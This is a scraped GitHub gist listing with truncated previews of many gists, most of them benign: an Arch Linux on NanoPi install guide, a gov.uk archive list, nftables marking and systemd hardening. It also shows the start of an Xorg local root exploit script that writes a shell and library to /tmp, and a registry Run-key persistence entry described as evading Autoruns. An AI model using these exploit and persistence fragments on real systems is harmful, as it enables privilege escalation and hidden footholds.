Skip to content

Instantly share code, notes, and snippets.

View kravietz's full-sized avatar

Paweł Krawczyk kravietz

87 followers · 24 following
View GitHub Profile
@larsch
larsch / archlinuxarm-on-nanopi-r2s.md
Created October 10, 2020 10:48
Installing Arch Linux AArch64 on the NanoPi R2S

Installing Arch Linux AArch64 on the NanoPi R2S

There is current no support for the NanoPi R2S in ArchLinuxArm, but it's possible to run it using the generic aarch64 installation.

Prepare sd-card/image

  1. Copy bootloader and uBoot from an armbian image using for the NanoPi R2S using dd (sectors 32 to 32767) everything before the partition, except the partition table).
  2. Create an ext4 partition on /dev/mmcblk0p1 at offset of 32768 sectors (16384 KiB):
Device         Boot Start      End  Sectors  Size Id Type
@dwisiswant0
dwisiswant0 / st8out.sh
Last active February 17, 2024 16:48
St8out - Extra one-liner for reconnaissance
#!/bin/bash
#####
#
# St8out - Extra one-liner for reconnaissance
#
# Usage: ./st8out.sh target.com
#
# Resources:
# - https://github.com/j3ssie/metabigor
@Jonty
Jonty / uk_gov_websites_archive.md
Last active July 28, 2020 20:02
The earliest Archive.org snapshot of every UK Government domain

Recently @alexparsons asked Democracy Club what the earliest local authority website was. Nobody knew, but we had fun looking at pages from 1996.

I pulled up my old IPv4 reverse DNS scan of .gov.uk domains, and the official list of .gov.uk domains, then queried the internet archive for each one.

The list below is every UK Government website sorted by the first time the Internet Archive saved a copy.

The links go to the archived version of the site at that time. Expect to get nostalgic. - @jonty

Archive date Domain
@rjhansen
rjhansen / keyservers.md
Last active October 26, 2024 22:16
SKS Keyserver Network Under Attack

SKS Keyserver Network Under Attack

This work is released under a Creative Commons Attribution-NoDerivatives 4.0 International License.

Terminological Note

"OpenPGP" refers to the OpenPGP protocol, in much the same way that HTML refers to the protocol that specifies how to write a web page. "GnuPG", "SequoiaPGP", "OpenPGP.js", and others are implementations of the OpenPGP protocol in the same way that Mozilla Firefox, Google Chromium, and Microsoft Edge refer to software packages that process HTML data.

Who am I?

@0x27
0x27 / x0rg.sh
Created October 25, 2018 21:05
#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
@ruario
ruario / 1-README.md
Last active August 8, 2024 12:41
A script that fetches a ChromeOS image for ARM32 and extracts the Widevine binary, saving it in a compressed archive for use with Vivaldi

The included script 'widevine-flash_armhf.sh' fetches a ChromeOS image for ARM and extracts the Widevine binary, saving it in a compressed archive. Since it downloads a fairly large file (2Gb+ on disk after download) it is recommended that you run the script on a machine that has plenty of disk space.

To install the resultant archive, issue the following on your ARM machine–after copying over the archive if needed:

sudo tar Cfx / widevine-flash-20200124_armhf.tgz

(Where 'widevine-flash-20200124_armhf.tgz' is updated to reflect the actual name of the created archive)

@gaoyifan
gaoyifan / tc-mark.nft
Created September 24, 2018 10:20
Traffic control mark with nftables
#! /usr/sbin/nft -f
chain tc-wan {
# check default priority
mark & 0xff0 == 0x130 ip dscp set af22 return
# real-time application
## Dota2
udp dport 27000-27200 \
meta mark set mark & 0xfffff00f ^ 0x110 ip dscp set af41 return
@sapran
sapran / mobileapppentestingworksho.md
Last active December 25, 2023 10:00
Links and snippets for mobile app pentesting workshop
@hasherezade
hasherezade / test.reg
Last active December 31, 2023 19:26
Demo: persistence key not visible for sysinternals autoruns (in a default configuration - read more: https://twitter.com/hasherezade/status/849756054145699840)
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
@="Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \"C:\\ProgramData\\test.exe\""
@ageis
ageis / systemd_service_hardening.md
Last active November 15, 2024 09:28
Options for hardening systemd service units

security and hardening options for systemd service units

A common and reliable pattern in service unit files is thus:

NoNewPrivileges=yes
PrivateTmp=yes
PrivateDevices=yes
DevicePolicy=closed
ProtectSystem=strict